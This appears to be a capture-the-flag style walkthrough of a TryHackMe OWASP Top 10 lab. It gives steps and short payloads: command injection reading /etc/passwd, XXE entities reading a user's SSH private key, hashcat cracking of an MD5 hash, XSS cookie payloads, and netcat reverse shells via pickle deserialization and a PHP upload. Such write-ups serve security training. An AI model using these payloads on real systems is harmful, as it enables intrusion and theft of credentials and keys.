What
“This room breaks each OWASP topic down and includes details on what the vulnerability is, how it occurs and how you can exploit it. You will put the theory into practise by completing supporting challenges.”
Difficulty: Easy
Badge:
#1 - Injection
“Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.”
Task 5 / Question 1 - What strange text file is in the website root directory?
Start the VM and navigate to http://$MACHINE_IP/evilshell.php
Run ls
Task 5 / Question 2 - How many non-root/non-service/non-daemon users are there?
Use cat /etc/passwd and look for ‘regular’ users
Task 5 / Question 3 - What user is this app running as?
Use whoami
Task 5 / Question 4 - What is the user’s shell set as?
Run cat /etc/passwd | grep $username where ‘$username’ is from Question 3
Task 5 / Question 5 - What version of Ubuntu is running?
Retrieve version number with lsb_release -d
Task 5 / Question 6 - Print out the MOTD. What favorite beverage is shown?
Get the answer with cat /etc/update-motd.d/00-header
#2 - Broken Authentication
“Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.”
Task 7 / Question 1 - What is the flag that you found in darren’s account?
Simple - register with " darren", a random email address and a password.
Task 7 / Question 2 - Now try to do the same trick and see if you can login as arthur
Sure it does work.
Task 7 / Question 3 - What is the flag that you found in arthur’s account?
Do the same as with " darren" and you’ll get the flag.
#3 - Sensitive Data Exposure
“Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.”
Task 11 / Question 1 - What is the name of the mentioned directory?
Only one folder is mentioned in the html source.
Task 11 / Question 2 - Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
Navigate to the mentioned directory, it is vulnerable to directory listing. You’ll see a file that shouldn’t be visible.
Task 11 / Question 3 - Use the supporting material to access the sensitive data. What is the password hash of the admin user?
By following the supporting material in Task 9, you should be able to extract the password hash from the database file.
Note that the hash is in the 3rd column.
Task 11 / Question 4 - Crack the hash. What is the admin’s plaintext password?
Follow the steps as described in Task 10 to get the plaintext password.
You can also crack the hash locally. First, identify the hash type with hash-identifier. Looks like, it’s an MD5 hash.
Save the hash into a txt file. Look up on this page, which hash-mode you should use for Hashcat to crack the MD5. Finally, run Hashcat.
hashcat -m 0 -a 0 -w 3 -O hash.txt /usr/share/wordlists/rockyou.txt
Task 11 / Question 5 - Login as the admin. What is the flag?
Get the flag using the cracked password.
#4 - XML External Entities (XXE)
“Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.”
Task 16 / Question 1 - Try to display your own name using any payload
With a small modification of the example in Task 15:
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
<userInfo>
<firstName>My Own Name</firstName>
</userInfo>
Task 16 / Question 2 - See if you can read the /etc/passwd
Indeed, using the example from Task 15 without touching it:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
Task 16 / Question 3 - What is the name of the user in /etc/passwd
It is the last entry in the passwd file - “falcon” as it is spoiled in the next questions..
Task 17 / Question 4 - Where is falcon’s SSH key located?
It is in the default directory, using the default filename: run ssh-keygen if unsure.
Task 17 / Question 5 - What are the first 18 characters for falcon’s private key
Just a small path modification on the payload we used to retrieve the passwd file:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
You should copy the first 18 characters of the key
-----BEGIN RSA PRIVATE KEY-----
[copy the first 18 chars from here][rest of the key]
-----END RSA PRIVATE KEY-----
#5 - Broken Access Control
“Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.”
Task 18 / Question 3 - Look at other users notes. What is the flag?
As you log on with the given credentials noot and test1234, you’ll see a note. What you see in the address bar is the definition of IDOR (Insecure Direct Object Reference).
Work on that number that identifies the displayed note. You can try a few numbers manually, or some automatization for a larger pool of numbers. Anyway, just start from the beginning ;)
#6 - Security Misconfiguration
“Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.”
Task 19 / Question 2 - Hack into the webapp and find the flag
- After deploying the VM, we can see the application name.
- Google for it and follow the first result (should be the GitHub repo of the app).
- Go through the README.md and find the default credentials on the bottom of the page (“Specifically, this VM focusses on default passwords”).
- Use those credentials to get the flag.
#7 - Cross-Site Scripting (XSS)
“XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.”
Now, this is fun!
Task 20 / Question 2 - … craft a reflected XSS payload that will cause a popup saying “Hello”
Use a very basic payload here:
<script>alert('Hello');</script>
Task 20 / Question 3 - … craft a reflected XSS payload that will cause a popup with your machines IP address
Refer to w3schools, or HTML Living Standards or Mozilla on this.
<script>alert(window.location.hostname);</script>
Task 20 / Question 4 - … add a comment and see if you can insert some of your own HTML
First, I tried to insert a HTML element, without luck. Then I put here a simple horizontal rule that has revealed the next flag.
<hr>
Task 20 / Question 5 - … create an alert popup box appear on the page with your document cookies
Read more on w3schools or Mozilla.
<script>alert(document.cokies);</script>
Task 20 / Question 6 - Change “XSS Playground” to “I am a hacker” by adding a comment using Javascript
First, check page sources and look for the title with “XSS Playground” value (use Ctrl+Shift+C or the “Select an element” icon).
Again, refer to w3schools, Mozilla or StackOverflow - notice that XSS vulnerability is mentioned in a comment.
<script>document.getElementById("thm-title").innerHTML = "I am a hacker";</script>
#8 - Insecure Deserialization
“Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.”
Task 25 / Question 1 - 1st flag (cookie value)
Copy the value of sessionId cookie and decode it in terminal:
echo '$sessionId' | base64 --decode
Task 25 / Question 2 - 2nd flag (admin dashboard)
Change the value of “userType” cookie from “user” to “admin”.
Task 26 / Question 1 - flag.txt
Following the task description, change the value of userType cookie back from “admin” to “user” and return to the myprofile page.
Click on “Exchange your vim”. This will create another cookie, called “encodedPayload” with some default value. We will update this.
Download pickleme.py from task description and edit with your favorite editor. Replace “YOUR_TRYHACKME_VPN_IP”. Also, start netcat listening on port 4444.
Run pickleme to generate a base64 encoded payload that will connect from the remote server to your computer’s port, where netcat is listening. Grab that code between the speech marks.
Update the value of “encodedPayload” cookie with the output string from previous step.
Navigate to the feedback page and refresh. This will decode the updated cookie’s value and create a remote shell to the web server (read task description).
Don’t be like me - I haven’t read the description thoroughly, this is why timestamps and commands are inconsistent (compared to previous ones) on the last screenshot..
#9 - Using Components with Known Vulnerabilities
“Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.”
Task 29 / Question 1 - How many characters are in /etc/passwd
There are multiple ways to get a remote shell on this VM. Let me show the short way first.
Open Exploit Database and look for “online book store”. If you are looking for “CSE bookstore”, you won’t find RCE payload (described in the long version).
How I got “online book store”? Follow the link on the bottom of home page to projectworlds.in and look for “book store”. Grab the first 3 words of the result and drop into the search bar of exploit-db.
Download and execute the exploit. The only required parameter is the IP of the VM.
Clean and elegant exploit from Tib3rius, follow him on Twitter, Twitch and YouTube.
Job’s done.
Long(er) version.
Yes, I was looking for “CSE bookstore” on exploit-db. There is an exploit for authentication bypass that I’ve used to get admin on the website. Use the credentials you can see in the 48960 (SQL injection on /admin.php).
Open netcat to listen port 4444
sudo nc -lvnp 4444
Add a new book.
Add details:
- For ISBN, add an integer as it will be used to identify the book (
/books.php?bookisbn=1) - For Publisher, select something that already exists in the database
- As an Image, select your prepared (IP address, port) payload.
I used a php reverse shell from pentestmonkey, only updated with my VPN IP address and the port where netcat is listening.
Navigate to the books page to activate the payload.
Enjoy the remote shell.
#10 - Insufficient Logging & Monitoring
“Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.”
Task 30 / Question 1 - What IP address is the attacker using?
We can see a few 401 Unauthorized login attempts in the downloaded logfile. Use the IP address from these lines.
Task 30 / Question 2 - What kind of attack is being carried out?
Screaming from the logfile, that someone is trying to find default credentials (‘admin’, ‘administrator’, ‘anonymous’, ‘root’) from the same IP address, using brute force, looking for Broken Authentication.